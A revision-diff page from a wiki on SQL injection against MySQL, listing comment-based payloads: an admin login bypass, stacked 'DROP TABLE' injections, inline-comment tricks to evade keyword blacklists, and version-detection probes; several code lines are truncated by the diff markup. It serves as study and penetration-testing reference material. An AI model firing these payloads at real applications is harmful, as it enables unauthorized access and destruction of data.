hacking:sql_injection:mysql:comments
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| hacking:sql_injection:mysql:comments [2020/04/16 21:33] – peter | hacking:sql_injection:mysql:comments [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Hacking - SQL Injection - MySQL - Comments ====== | ====== Hacking - SQL Injection - MySQL - Comments ====== | ||
| + | ===== Line Comments ===== | ||
| + | |||
| + | Comments out rest of the query. | ||
| + | |||
| + | Line comments are generally useful for ignoring rest of the query so you don't have to deal with fixing the syntax. | ||
| + | |||
| + | <code sql> | ||
| + | DROP sampletable; | ||
| + | |||
| + | DROP sampletable;# | ||
| + | </ | ||
| + | |||
| + | ---- | ||
| + | |||
| + | Line Comments Sample SQL Injection Attacks | ||
| + | |||
| + | <code sql> | ||
| + | Username: admin' | ||
| + | SELECT * FROM members WHERE username = ' | ||
| + | This is going to log you as admin user, because rest of the SQL query will be ignored. | ||
| + | </ | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ===== Inline Comments ===== | ||
| + | |||
| + | Comment out rest of the query by not closing them or you can use for bypassing blacklisting, | ||
| + | |||
| + | <code sql> | ||
| + | /*Comment Here*/ | ||
| + | |||
| + | DROP/ | ||
| + | |||
| + | DR/ | ||
| + | |||
| + | SELECT/ | ||
| + | </ | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ==== Special Comment Syntax for MySQL ==== | ||
| + | |||
| + | This is a special comment syntax for MySQL. | ||
| + | |||
| + | <code sql> | ||
| + | /*! MYSQL Special SQL */ | ||
| + | </ | ||
| + | |||
| + | It's perfect for detecting MySQL version. If you put a code into this comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version. | ||
| + | |||
| + | <code sql> | ||
| + | SELECT /*!32302 1/0, */ 1 FROM tablename | ||
| + | </ | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ==== Classical Inline Comment SQL Injection Attack Samples ==== | ||
| + | |||
| + | <code sql> | ||
| + | ID: 10; DROP TABLE members /* | ||
| + | </ | ||
| + | |||
| + | Simply get rid of other stuff at the end the of query. Same as: | ||
| + | |||
| + | <code sql> | ||
| + | 10; DROP TABLE members -- | ||
| + | </ | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ==== Division by 0 error ==== | ||
| + | |||
| + | <code sql> | ||
| + | SELECT /*!32302 1/0, */ 1 FROM tablename | ||
| + | </ | ||
| + | |||
| + | Will throw a division by 0 error if MySQL version is higher than3.23.02 | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ==== MySQL Version Detection Sample Attacks ==== | ||
| + | |||
| + | <code sql> | ||
| + | ID: /*!32302 10*/ | ||
| + | ID: 10 | ||
| + | </ | ||
| + | |||
| + | You will get the same response if MySQL version is higher than 3.23.02 | ||
| + | |||
| + | <code sql> | ||
| + | SELECT /*!32302 1/0, */ 1 FROM tablename | ||
| + | </ | ||
| + | |||
| + | Will throw a division by 0 error if MySQL version is higher than3.23.02 | ||
| + | |||
| + | ---- | ||
hacking/sql_injection/mysql/comments.1587072838.txt.gz · Last modified: 2020/07/15 09:30 (external edit)